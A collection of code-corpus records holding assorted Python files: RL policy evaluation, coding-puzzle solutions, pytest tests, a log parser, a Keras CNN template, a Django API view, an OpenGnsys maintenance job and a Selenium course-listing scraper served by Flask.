+{"seq_id":"58200284","text":"import numpy as np\nimport gym\nimport mujoco_py\nimport matplotlib.pyplot as plt\nfrom gym.spaces import Discrete, Box\nimport argparse\nfrom actor import Actor\n\ndef evaluate_policy(env, policy, test_episode=100, max_step=500, render=False, plot=False):\n reward_list = []\n\n for i_episode in range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list.append(total_reward)\n break\n # update observation\n observation = observation_next\n\n if plot:\n plt.plot(np.arange(test_episode), reward_list)\n plt.xlabel('Episode')\n plt.ylabel('Episode reward')\n plt.show()\n\n m, s = np.mean(reward_list), np.var(reward_list)\n \n return m, s\n\n\ndef compare_policy(env, policy1, policy2, test_episode=100, max_step=200, render=False, plot=False):\n\n reward_list1 = []\n\n for i_episode in range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy1(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list1.append(total_reward)\n\n print(\"Episode: \", i_episode, \" step in this episode:\", step, \" reward: \", total_reward)\n break\n\n # update observation\n observation = observation_next\n\n reward_list2 = []\n for i_episode in range(test_episode):\n observation = env.reset()\n step = 0\n total_reward = 0.0\n\n while True:\n step += 1\n if render:\n env.render()\n\n action = policy2(observation)\n observation_next, reward, done, info = env.step(action)\n total_reward += reward\n\n if done or step >= max_step:\n reward_list2.append(total_reward)\n\n print(\"Episode: \", i_episode, \" step in this episode:\", step, \" reward: \", total_reward)\n break\n\n # update observation\n observation = observation_next\n\n if plot:\n\n plt.subplot(2, 1, 1)\n plt.plot(np.arange(test_episode), reward_list1)\n plt.xlabel('Episode')\n plt.ylabel('Episode Reward for policy 1')\n plt.subplot(2, 1, 2)\n plt.plot(np.arange(test_episode), reward_list2)\n plt.xlabel('Episode')\n plt.ylabel('Episode Reward for policy 2')\n plt.show()\n\n m1, s1, m2, s2 = np.mean(reward_list1), np.var(reward_list1), np.mean(reward_list2), np.var(reward_list2)\n print(\"average reward for first policy: \", m1)\n print(\"variance of reward for first policy: \", s1)\n print(\"average reward for second policy: \", m2)\n print(\"variance of reward for second policy: \", s2)\n\n return m1, s1, m2, s2\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"env_name\", help=\"gym env name: classic control (CartPole-v1, MountainCarContinuous-v0, Pendulum-v0 ... 
)\")\n parser.add_argument(\"--plot\", dest=\"plot\", action=\"store_true\", help=\"plot two policy performance.\")\n parser.add_argument(\"--test_episode\", dest=\"test_episode\", type=int, help=\"how many test episodes\")\n parser.set_defaults(plot=False, test_episode=100)\n\n args = parser.parse_args()\n\n model_path = './checkpoints/' + args.env_name + '/'\n\n env = gym.make(args.env_name)\n\n # hyperparams\n learning_rate = 0.02\n reward_decay = 0.995\n max_episode = 2\n\n\n if isinstance(env.observation_space, Discrete):\n state_dim = env.observation_space.n\n elif isinstance(env.observation_space, Box):\n state_dim = env.observation_space.shape[0]\n\n if isinstance(env.action_space, Discrete):\n action_choice = env.action_space.n\n action_dim = 1\n discrete_ac = True\n elif isinstance(env.action_space, Box):\n action_dim = env.action_space.shape[0]\n discrete_ac = False\n\n controller = Actor(action_dim=action_dim, state_dim=state_dim, learning_rate=learning_rate, discrete_ac=discrete_ac)\n controller.load_weights(model_path + 'actor.ckpt')\n\n policy1 = controller.take_quick_action\n \n def random_policy(obs):\n return env.action_space.sample()\n policy2 = random_policy\n \n\n m1, s1, m2, s2 = compare_policy(env, policy1, policy2, test_episode=args.test_episode, plot=args.plot)\n\n\n\n\n\n","sub_path":"gppg_model/test_actor.py","file_name":"test_actor.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"593247568","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n prod_right = list(nums)\n for i in range(1, len(prod_right)):\n prod_right[i] *= prod_right[i-1]\n prod_left = list(nums)\n for i in range(2, len(prod_left)):\n prod_left[len(prod_left) - i] *= prod_left[len(prod_left) - i + 1]\n \n results = []\n for i in range(len(nums)):\n l = 1 if i == 0 else prod_right[i - 1]\n r = 1 if i == len(nums) - 1 else prod_left[i + 1]\n results.append(l * r)\n return results\n\n","sub_path":"LeetCode/Problems/238 - Product of Array Except Self.py","file_name":"238 - Product of Array Except Self.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"149877085","text":"import numpy as np\nimport pandas as pd\nimport pytest\n\nfrom tests.utils import is_close_to_zero\nfrom vivid.featureset.atoms import StringContainsAtom, AbstractAtom, NotMatchLength, AbstractMergeAtom\nfrom vivid.featureset.utils import create_data_loader\n\n\ndef test_string_contains_atom():\n class TitleContainsAtom(StringContainsAtom):\n queryset = {\n 'title': ['a', 'b'],\n 'place': ['osaka', 'o']\n }\n\n df = pd.DataFrame([\n ['a', 'a', 'b', 'c', 'b'],\n ['tokyo', 'OSaka', 'osaka', None, 'kobe']\n ], index=['title', 'place']).T\n\n df_feat = TitleContainsAtom().generate(df)\n\n assert is_close_to_zero([1, 1, 0, 0, 0], df_feat.values[:, 0])\n assert is_close_to_zero([0, 0, 1, 0, 1], df_feat.values[:, 1])\n\n assert is_close_to_zero([0, 1, 1, 0, 0], df_feat['place_osaka'])\n assert is_close_to_zero([1, 1, 1, 0, 1], df_feat['place_o'])\n\n\nclass TestAbstractAtom:\n\n def test_implementation(self):\n df_input = pd.DataFrame(np.random.uniform(size=(10, 4)))\n\n class Atom1(AbstractAtom):\n use_columns = None\n\n with pytest.raises(NotImplementedError):\n Atom1().generate(df_input)\n\n class Atom2(AbstractAtom):\n use_columns = ('hoge', None,)\n\n with 
pytest.raises(ValueError):\n Atom2()\n\n class Atom3(AbstractAtom):\n use_columns = ('hogehoge') # not tuple\n\n with pytest.raises(TypeError):\n Atom3()\n\n def test_input_columns(self):\n df_input = pd.DataFrame(np.random.uniform(size=(10, 2)), columns=['foo', 'bar'])\n\n class NotMatchAtom(AbstractAtom):\n use_columns = ('foo', 'bar',)\n\n def transform(self, input_df):\n # return invalid shape datafrme\n return input_df.sample(5)\n\n with pytest.raises(NotMatchLength):\n NotMatchAtom().generate(df_input)\n\n class InvalidColumnAtom(AbstractAtom):\n # not exist input dataframe\n use_columns = ('hoge',)\n\n with pytest.raises(ValueError):\n InvalidColumnAtom().generate(df_input)\n\n\nMERGE_KEY = 'key'\n\n\ndef create_test_df():\n df_master = pd.DataFrame([\n [1, 2],\n [2, 5],\n [3, 10]\n ], columns=[MERGE_KEY, 'col1'])\n return df_master\n\n\ntest_loader = create_data_loader(create_test_df)\n\n\nclass TestMergeAtom:\n def setup_method(self):\n self.df_not_have_key = pd.DataFrame(np.random.uniform(size=(10, 2)), columns=['foo', 'bar'])\n self.df_has_key = pd.DataFrame([\n [1, 2], [1, 2], [1, 2], [1, 2], [2, 2],\n ], columns=[MERGE_KEY, 'hoge'])\n\n def test_invalid_implement(self):\n class InvalidAtom(AbstractMergeAtom):\n pass\n\n with pytest.raises(AttributeError):\n InvalidAtom()\n\n class InvalidAtom2(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def generate_outer_feature(self):\n return self.df_outer\n\n with pytest.raises(NotImplementedError):\n InvalidAtom2().generate(self.df_has_key)\n\n def test_basic(self):\n class BasicMergeAtom(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def read_outer_dataframe(self):\n return test_loader.read()\n\n def generate_outer_feature(self):\n return self.df_outer\n\n with pytest.raises(ValueError):\n BasicMergeAtom().generate(self.df_not_have_key)\n\n df_out = BasicMergeAtom().generate(self.df_has_key)\n assert df_out.columns.tolist() == ['col1']\n assert df_out.shape == (len(self.df_has_key), 1)\n\n def test_master_loader(self):\n class BasicMergeAtom(AbstractMergeAtom):\n merge_key = MERGE_KEY\n\n def read_outer_dataframe(self):\n return test_loader.read()\n\n def generate_outer_feature(self):\n return self.df_outer\n\n atom = BasicMergeAtom()\n atom.generate(self.df_has_key)\n\n assert atom._master_dataframe is not None\n","sub_path":"tests/test_featureset/test_atoms.py","file_name":"test_atoms.py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"432717840","text":"from collections import Counter\n\nfilepath='apache.log'\nmydict = {}\nip_list = []\n#functiondefns\n\ndef createDict(line):\n ipmsg = line.split('\\n')[0].split('- -')\n ip = ipmsg[0]\n ip_list.append(ip);\n action = (ipmsg[1].split('\"')[1]).split('\"')[0]\n if ip not in mydict.keys():\n mydict[ip] = action\n elif ip in mydict.keys():\n mydict[ip] = mydict[ip]+','+action\n #ip = ip.append(ip)\ndef getIPCounter():\n return Counter(ip_list)\ndef countKeys():\n for key, value in mydict.iteritems():\n #print (key, value)\n if ',' in value:\n print(key, len(value.split(',')))\n #continue\n else:\n print(key, 1)\n #continue\n\n\nfor line in open(filepath, 'r+'):\n createDict(line)\n\nipcount = getIPCounter()\ndict_count = countKeys()\n#print mydict\n#print \"ipcount is:\", ipcount\n#print \"dict_count is\", dict_count\n#mydict_len = len(mydict)\n#print \"Total IPs found in log file are:\", ipcount\n#print \"Here are the IPs found in log file\\n\", ip_list\n\n#print \"mydict_len\", 
mydict_len\n","sub_path":"log-parsing/pyCounter.py","file_name":"pyCounter.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"419359551","text":"'''\nGiven an array of integers, calculate which fraction of its elements \nare positive, which fraction of its elements are negative, \nand which fraction of its elements are zeroes, respectively. \nPrint the decimal value of each fraction on a new line.\n\nOutput Format\n\nYou must print the following 3 lines:\n\nA decimal representing of the fraction of positive numbers in the array compared to its size.\nA decimal representing of the fraction of negative numbers in the array compared to its size.\nA decimal representing of the fraction of zeroes in the array compared to its size.\n\nlink: https://www.hackerrank.com/challenges/plus-minus/problem\n'''\nimport sys\n\ndef plusMinus(arr):\n pos = 0\n neg = 0\n zero = 0\n for num in arr:\n if num > 0:\n pos += 1\n elif num < 0:\n neg += 1\n else:\n zero += 1\n \n print(\"%.6f\" % (pos/float(len(arr))))\n print(\"%.6f\" % (neg/float(len(arr))))\n print(\"%.6f\" % (zero/float(len(arr))))\n\nif __name__ == \"__main__\":\n n = int(raw_input().strip())\n arr = map(int, raw_input().strip().split(' '))\n plusMinus(arr)","sub_path":"hackerrank/Warmup/PlusMinus.py","file_name":"PlusMinus.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298933604","text":"from execution.abstract.querie import * \nfrom execution.symbol.environment import *\nfrom execution.symbol.table import *\nfrom execution.symbol.column import *\nfrom execution.symbol.typ import *\nfrom storageManager import jsonMode as admin\n\nclass Add_Constraint(Querie):\n ''' \n row = numero de fila\n column = numero de columna\n columnName = espera un nombre de columna debe de ser una cadena\n constraintval = espera un constraint esto seria un dicionario con la siguiente sintaxis:\n [\n {'type': 'primary', 'name':nombre para el constraint(cadena) , 'value': nombre de la columna que es la llave primaria(cadena)},-> si es una llave primaria\n {'type': 'foreign', 'name':nombre para el constraint(cadena), 'value': nombre de la columna que es la llave foranea(cadena), 'references': campo_tabla_extranjera}, -> si es una llave foranea\n {'type': 'not null', 'name':nombre para el constraint(cadena), 'value': nombre de la columna que es nula(cadena)}, -> si es un NOT NULL\n {'type': 'check', 'name':nombre para el constraint(cadena), 'value':objetoExpression -> un ojeto exp ejemplo (5>10)}, -> si es un CHECK\n {'type': 'unique', 'name':nombre para el constraint(cadena),'value': nombre de la columna que va a ser unique(cadena)} si es un UNIQUE\n ]\n {'type': 'primary', 'name':'pk_tabla1' , 'value': 'columna_tabla1'}\n \n '''\n def __init__(self,columnName,constraintVal, row, column):\n Querie.__init__(self, row, column)\n self.columnName = columnName\n self.constraintVal = constraintVal\n\n # constraintVal es un diccionario {'type': 'unique', 'name':nombre,'value': campo_unico}\n def execute(self, environment,tableName):\n if not isinstance(self.columnName,str):\n return {'Error': 'El nombre indicado de la columna no es una cadena.', 'Fila':self.row, 'Columna': self.column }\n if not isinstance(tableName,str):\n return {'Error': 'El nombre indicado de la tabla no es una cadena.', 'Fila':self.row, 'Columna': self.column }\n \n db_name = 
environment.getActualDataBase()\n database = environment.readDataBase(db_name)\n table = database.getTable(tableName)\n\n repetido = False\n for item in table.constraint:\n if item['name'] == self.constraintVal['name']:\n repetido = True\n break\n if repetido == True:\n return {'Error': 'ya existe una restriccion con el mismo nombre', 'Fila':self.row, 'Columna': self.column }\n \n #columna a la que hace referencia menos el check\n if self.constraintVal['type'] != 'check':\n reference = False\n for item in table.columns:\n if item.name == self.constraintVal['value']:\n reference = True\n break\n if reference == False:\n return {'Error': 'La columna a la que hace referencia la restriccion no existe en la tabla: '+tableName, 'Fila':self.row, 'Columna': self.column }\n \n if self.constraintVal['type'] == 'primary':\n for item in table.constraint:\n if item['value'] == self.constraintVal['value']:\n if item['type'] == 'primary':\n return 'la columna: '+self.columnName +' ya tiene la restriccionde llave primaria'\n result = admin.extractTable(db_name, tableName)\n if isinstance(result,list):\n if len(result) > 0:\n return {'Error': 'No se puede agregar la llave primaria a la tabla: '+tableName+' porque la tabla ya contiene valores.', 'Fila':self.row, 'Columna': self.column }\n for item in table.constraint:\n if item['type'] == 'primary':\n self.constraintVal = {'type':self.constraintVal['type'],'name':item['name'],'value':self.constraintVal['value']}\n table.createConstraint(self.constraintVal)\n\n return 'la restriccion fue insertada en la tabla: '+tableName+' con exito.'\n\n\n\n\n","sub_path":"parser/team27/G-27/execution/querie/add_constraint.py","file_name":"add_constraint.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"470521171","text":"# // Time Complexity : O(n)\n# // Space Complexity : O(1)\n# // Did this code successfully run on Leetcode : Yes\n# // Any problem you faced while coding this : No\n\n# // Your code here along with comments explaining your approach\nclass Solution:\n def minCost(self, costs: List[List[int]]) -> int:\n \n if len(costs)==0:\n return 0\n \n # the values at 0th index don't have an option for choose/don't choose so we start from 1st index; we keep updating the values at the current index by adding the current price of color to the minimum of the other two prices of color at previous index (as two adjacent houses can't be painted with same color)\n\n for i in range(1, len(costs)):\n costs[i][0] += min(costs[i-1][1], costs[i-1][2])\n costs[i][1] += min(costs[i-1][0], costs[i-1][2])\n costs[i][2] += min(costs[i-1][0], costs[i-1][1])\n \n # return the minimum of the calculated value at pur last index\n return min(costs[len(costs)-1][0], min(costs[len(costs)-1][1], costs[len(costs)-1][2]))\n ","sub_path":"paintHouse.py","file_name":"paintHouse.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"579300133","text":"cout = input()\nfor i in range(int(cout)):\n t = input()\n initial = input()\n array = initial.split(\" \")\n character = []\n times = []\n for i in array:\n if i not in character:\n character.append(i)\n times.append(1)\n else:\n times[character.index(i)] += 1\n haveMost = False\n for j in range(len(times)):\n if int(times[j]) > float(t)/2:\n print(character[j])\n haveMost = True\n if not haveMost:\n 
print(-1)","sub_path":"Code/CodeRecords/2307/60619/234923.py","file_name":"234923.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"587335828","text":"import pandas as pd\nimport numpy as np\nimport os\nimport sys\nimport gzip\n\nfrom keras import backend as K\n\nfrom keras.layers import Input, Dense, Dropout, Activation, Conv1D, MaxPooling1D, Flatten\nfrom keras.optimizers import SGD, Adam, RMSprop\nfrom keras.models import Sequential, Model, model_from_json, model_from_yaml\nfrom keras.utils import np_utils\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, ReduceLROnPlateau\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, MaxAbsScaler\n\nimport sys, os\n#sys.path.append(os.getenv(\"CANDLE\")+'/Candle/common')\n#import candle_keras as candle\nsys.path.append(os.getenv(\"CANDLE\")+'/Benchmarks/common')\nimport candle\n\ndef load_data(train_path, test_path, hyperparams):\n\n print('Loading data...')\n df_train = (pd.read_csv(train_path,header=None).values).astype('float32')\n df_test = (pd.read_csv(test_path,header=None).values).astype('float32')\n print('done')\n\n print('df_train shape:', df_train.shape)\n print('df_test shape:', df_test.shape)\n\n seqlen = df_train.shape[1]\n\n df_y_train = df_train[:,0].astype('int')\n df_y_test = df_test[:,0].astype('int')\n\n Y_train = np_utils.to_categorical(df_y_train,hyperparams['classes'])\n Y_test = np_utils.to_categorical(df_y_test,hyperparams['classes'])\n\n df_x_train = df_train[:, 1:seqlen].astype(np.float32)\n df_x_test = df_test[:, 1:seqlen].astype(np.float32)\n\n# X_train = df_x_train.as_matrix()\n# X_test = df_x_test.as_matrix()\n\n X_train = df_x_train\n X_test = df_x_test\n\n scaler = MaxAbsScaler()\n mat = np.concatenate((X_train, X_test), axis=0)\n mat = scaler.fit_transform(mat)\n\n X_train = mat[:X_train.shape[0], :]\n X_test = mat[X_train.shape[0]:, :]\n\n return X_train, Y_train, X_test, Y_test\n\n\nprint ('Params:', hyperparams)\n\nfile_train = hyperparams['train_data']\nfile_test = hyperparams['test_data']\nurl = hyperparams['data_url']\n\n#train_file = candle.get_file(file_train, url+file_train, cache_subdir='Pilot1')\n#test_file = candle.get_file(file_test, url+file_test, cache_subdir='Pilot1')\ntrain_file = candle.get_file(file_train, url+file_train, datadir=os.getenv(\"CANDLE\")+'/Benchmarks/Data/Pilot1')\ntest_file = candle.get_file(file_test, url+file_test, datadir=os.getenv(\"CANDLE\")+'/Benchmarks/Data/Pilot1')\n\nX_train, Y_train, X_test, Y_test = load_data(train_file, test_file, hyperparams)\n\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nprint('Y_train shape:', Y_train.shape)\nprint('Y_test shape:', Y_test.shape)\n\nx_train_len = X_train.shape[1]\n\n# this reshaping is critical for the Conv1D to work\n\nX_train = np.expand_dims(X_train, axis=2)\nX_test = np.expand_dims(X_test, axis=2)\n\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nmodel = Sequential()\n\nlayer_list = list(range(0, len(hyperparams['conv']), 3))\nfor l, i in enumerate(layer_list):\n filters = hyperparams['conv'][i]\n filter_len = hyperparams['conv'][i+1]\n stride = hyperparams['conv'][i+2]\n print(int(i/3), filters, filter_len, stride)\n if hyperparams['pool']:\n pool_list=hyperparams['pool']\n if type(pool_list) != list:\n pool_list=list(pool_list)\n\n if filters <= 0 or filter_len <= 0 or stride <= 0:\n break\n if 
'locally_connected' in hyperparams:\n model.add(LocallyConnected1D(filters, filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))\n else:\n #input layer\n if i == 0:\n model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid', input_shape=(x_train_len, 1)))\n else:\n model.add(Conv1D(filters=filters, kernel_size=filter_len, strides=stride, padding='valid'))\n model.add(Activation(hyperparams['activation']))\n if hyperparams['pool']:\n model.add(MaxPooling1D(pool_size=pool_list[int(i/3)]))\n\nmodel.add(Flatten())\n\nfor layer in hyperparams['dense']:\n if layer:\n model.add(Dense(layer))\n model.add(Activation(hyperparams['activation']))\n if hyperparams['drop']:\n model.add(Dropout(hyperparams['drop']))\nmodel.add(Dense(hyperparams['classes']))\nmodel.add(Activation(hyperparams['out_act']))\n\n#Reference case\n#model.add(Conv1D(filters=128, kernel_size=20, strides=1, padding='valid', input_shape=(P, 1)))\n#model.add(Activation('relu'))\n#model.add(MaxPooling1D(pool_size=1))\n#model.add(Conv1D(filters=128, kernel_size=10, strides=1, padding='valid'))\n#model.add(Activation('relu'))\n#model.add(MaxPooling1D(pool_size=10))\n#model.add(Flatten())\n#model.add(Dense(200))\n#model.add(Activation('relu'))\n#model.add(Dropout(0.1))\n#model.add(Dense(20))\n#model.add(Activation('relu'))\n#model.add(Dropout(0.1))\n#model.add(Dense(CLASSES))\n#model.add(Activation('softmax'))\n\nkerasDefaults = candle.keras_default_config()\n\n# Define optimizer\noptimizer = candle.build_optimizer(hyperparams['optimizer'],\n hyperparams['learning_rate'],\n kerasDefaults)\n\nmodel.summary()\nmodel.compile(loss=hyperparams['loss'],\n optimizer=optimizer,\n metrics=[hyperparams['metrics']])\n\noutput_dir = hyperparams['save']\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\n# calculate trainable and non-trainable params\nhyperparams.update(candle.compute_trainable_params(model))\n\n# set up a bunch of callbacks to do work during model training..\nmodel_name = hyperparams['model_name']\npath = '{}/{}.autosave.model.h5'.format(output_dir, model_name)\n# checkpointer = ModelCheckpoint(filepath=path, verbose=1, save_weights_only=False, save_best_only=True)\ncsv_logger = CSVLogger('{}/training.log'.format(output_dir))\nreduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='auto', epsilon=0.0001, cooldown=0, min_lr=0)\ncandleRemoteMonitor = candle.CandleRemoteMonitor(params=hyperparams)\ntimeoutMonitor = candle.TerminateOnTimeOut(hyperparams['timeout'])\n\nhistory2 = model.fit(X_train, Y_train,\n batch_size=hyperparams['batch_size'],\n epochs=hyperparams['epochs'],\n verbose=1,\n validation_data=(X_test, Y_test),\n callbacks = [csv_logger, reduce_lr, candleRemoteMonitor, timeoutMonitor])\n\nscore = model.evaluate(X_test, Y_test, verbose=0)\n\nval_to_return = score[0]\n\nprint(model.metrics_names)\nprint(score)\n","sub_path":"templates/examples/bayesian/nt3_baseline_keras2.py","file_name":"nt3_baseline_keras2.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"471522204","text":"# -*- coding: utf-8 -*-\n\n#\n# Copyright (c) 2017-2019 Virtual Cable S.L.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of 
conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Virtual Cable S.L. nor the names of its contributors\n# may be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n.. moduleauthor:: Adolfo Gómez, dkmaster at dkmon dot com\n\"\"\"\nimport datetime\nimport logging\nimport typing\n\nfrom django.utils.translation import gettext_noop as _\n\nfrom uds.core import jobs\nfrom uds import models\n\nfrom .provider import OGProvider\nfrom .service import OGService\n\n# Not imported at runtime, just for type checking\nif typing.TYPE_CHECKING:\n from uds.core.module import Module\n\nlogger = logging.getLogger(__name__)\n\n\nclass OpenGnsysMaintainer(jobs.Job):\n frecuency = 60 * 60 * 4 # Once every 4 hours\n friendly_name = 'OpenGnsys cache renewal job'\n\n def run(self) -> None:\n logger.debug('Looking for OpenGnsys renewable cache elements')\n\n # Look for Providers of type VMWareVCServiceProvider\n provider: models.Provider\n for provider in models.Provider.objects.filter(\n maintenance_mode=False, data_type=OGProvider.typeType\n ):\n logger.debug('Provider %s is type openGnsys', provider)\n\n # Locate all services inside the provider\n service: models.Service\n for service in provider.services.all():\n instance: OGService = typing.cast(OGService, service.getInstance())\n since = models.getSqlDatetime() - datetime.timedelta(\n hours=instance.maxReservationTime.num() - 8\n ) # If less than 8 hours of reservation...\n # Now mark for removal every CACHED service that is about to expire its reservation on OpenGnsys\n userService: models.UserService\n for userService in models.UserService.objects.filter(\n deployed_service__service=service,\n creation_date__lt=since,\n cache_level=1,\n ):\n logger.info(\n 'The cached user service %s is about to expire. 
Removing it so it can be recreated',\n userService,\n )\n userService.remove()\n\n logger.debug('OpenGnsys job finished')\n","sub_path":"server/src/uds/services/OpenGnsys/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"543747945","text":"from django.db.models import Q\nfrom django.http import JsonResponse\nfrom rest_framework.decorators import APIView\n\nfrom caravans import models\n\n\nclass UOMAPIView(APIView):\n\n def post(self, request, *args, **kwargs):\n if request.data.get('type') == 'all':\n uom = models.UOM.objects.all()\n\n filter = request.data.get('search', False)\n if filter:\n uoms = uom.filter(\n Q(name=filter)\n )\n else:\n uoms = uom\n\n results = []\n for uom in uoms:\n results.append({\n 'id': uom.id,\n 'name': uom.name\n })\n\n return JsonResponse({'list': results})\n\n return JsonResponse({\n 'data': 'none'\n })\n","sub_path":"nac/caravans/views/uom_api.py","file_name":"uom_api.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485447535","text":"from bs4 import BeautifulSoup\nimport requests\nfrom tabulate import tabulate\nimport timeit\nfrom selenium import webdriver\nimport time\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.by import By\nfrom tqdm import tqdm\nimport pandas as pd\nfrom flask import jsonify\nfrom flask import request\nfrom flask import Flask\nimport json\n# from course_info import Course\n\napp = Flask(__name__)\n\n# browser = webdriver.Chrome()\n@app.route('/new_course', methods=['GET'])\ndef main():\n start = timeit.timeit()\n # browser = webdriver.Chrome()\n profile = webdriver.FirefoxProfile()\n profile.set_preference(\"permissions.default.image\", 2)\n opts = Options()\n opts.set_headless()\n assert opts.headless\n\n browser = webdriver.Firefox(firefox_profile=profile,options=opts)\n\n # chromeOptions = webdriver.ChromeOptions()\n # prefs = {'profile.managed_default_content_settings.images':2}\n # chromeOptions.add_experimental_option(\"prefs\", prefs)\n # browser= webdriver.Chrome('/usr/bin/chromedriver',chrome_options=chromeOptions)\n\n base_url = \"https://www.freetutorials.eu/\"\n\n browser.get(base_url)\n time.sleep(1)\n\n # response = requests.get(url)\n # print(response)\n #\n # soup = BeautifulSoup(response.content,'html.parser')\n # # print(soup.prettify(formatter='minimal'))\n #\n # courses = soup.find(\"div\",{\"class\":\"content-area\"})\n # articles = courses.find_all('article', {'class': 'post-box'})\n body = browser.find_element_by_tag_name(\"body\")\n elem = body.find_element_by_class_name(\"content-area\")\n # articles = elem.find_elements_by_class_name(\"post-box\")\n\n page_down = 20\n\n courses = list()\n\n size = 0\n # pbar = tqdm(total=page_down)\n while page_down:\n\n body.send_keys(Keys.PAGE_DOWN)\n time.sleep(.2)\n page_down -= 1\n articles = elem.find_elements_by_class_name(\"post-box\")\n # print(type(articles))\n\n # print(size)\n for article in articles[size:]:\n # course = Course()\n\n title = article.find_element_by_class_name(\"entry-title\")\n # url = title.get_attribute('href')\n url = title.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n # print(url)\n # find_element(By.XPATH,\"//h2[@class='entry-title']/a\").getAttribute(\"href\")\n upload_date = 
article.find_element_by_class_name('published').text\n            image = article.find_element_by_class_name('attachment-featured').get_attribute('src')\n            # url = articles.\n            course = {'title':title.text,'url':url,'upload_date':upload_date,'image':image}\n            courses.append(course)\n            # course.title = title.text\n            # titles.append(title.text)\n            # urls.append(url)\n            # course.url = url\n            # course.upload_date = upload_date\n            # upload_dates.append(upload_date)\n            # course.image = image\n            # images.append(image)\n            # value = title.get_attribute('href')\n            # titles.update({key:value})\n            # courses.append(course)\n\n        size = len(articles)\n        # pbar.update(1)\n\n    # pbar.close()\n\n    # print(courses)\n    # for article in articles:\n    # print\n    # a = article.find(\"article\",{\"class\":\"post-box\"})\n    # header = ['Title','URL']\n    # print(tabulate(titles,headers=header))\n\n\n    # df = pd.DataFrame({'Title':titles,'Upload dates':upload_dates,'Link':urls,'Thumbnail':images})\n    # df.to_csv('new_courses')\n    # df.to_json('new_courses.json')\n    # print(df)\n    # print('Courses saved')\n    # print(tabulate(titles))\n    end = start - timeit.timeit()\n\n\n    # print(\"Webcrawling time ---------------> \",str(end*1000))\n    # browser.__exit__()\n    # print(titles)\n    browser.quit()\n    # print(courses)\n    return jsonify({'code':200,'data':courses,'time':end*1000})\n\n\n\nif(__name__ == '__main__'):\n    